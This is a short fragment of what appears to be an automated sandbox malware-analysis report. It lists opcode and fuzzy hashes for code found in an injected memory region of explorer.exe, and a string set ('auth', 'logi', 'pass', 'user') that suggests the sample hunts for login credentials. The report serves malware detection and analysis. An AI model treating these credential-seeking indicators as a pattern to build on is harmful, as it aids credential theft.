                  • Opcode ID: 5072b037e942337ab811f998ffd9953c242ad741fd2d6bf78cb611ad7feb4bf3
                  • Instruction ID: e81c7ae42b7b868a7cf27bb0098ec1d855dbfaeb781c02bac578af32f75089d4
                  • Opcode Fuzzy Hash: 5072b037e942337ab811f998ffd9953c242ad741fd2d6bf78cb611ad7feb4bf3
                  • Instruction Fuzzy Hash: 0E217A70A24A0E9FDB08EFA8C0547AEBAF0FB18314F50962EE149D3600DB7895918B84
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: auth$logi$pass$user
                  • API String ID: 0-2393853802
                  • Opcode ID: a37919153ffc4ff3dc3929123cf37de87366a28acd233596b3269bbf77c87ba0
                  • Instruction ID: af3bf4d2ac1f4273c8d6d56ccd5b214a35fd08941204bd1bc9dfe3a385c2fa83
                  • Opcode Fuzzy Hash: a37919153ffc4ff3dc3929123cf37de87366a28acd233596b3269bbf77c87ba0
                  • Instruction Fuzzy Hash: 2421AC30614B0D8BCF45DF9A98A17AEB7F1EF88754F009619A44AEB244D7B0D9148BC2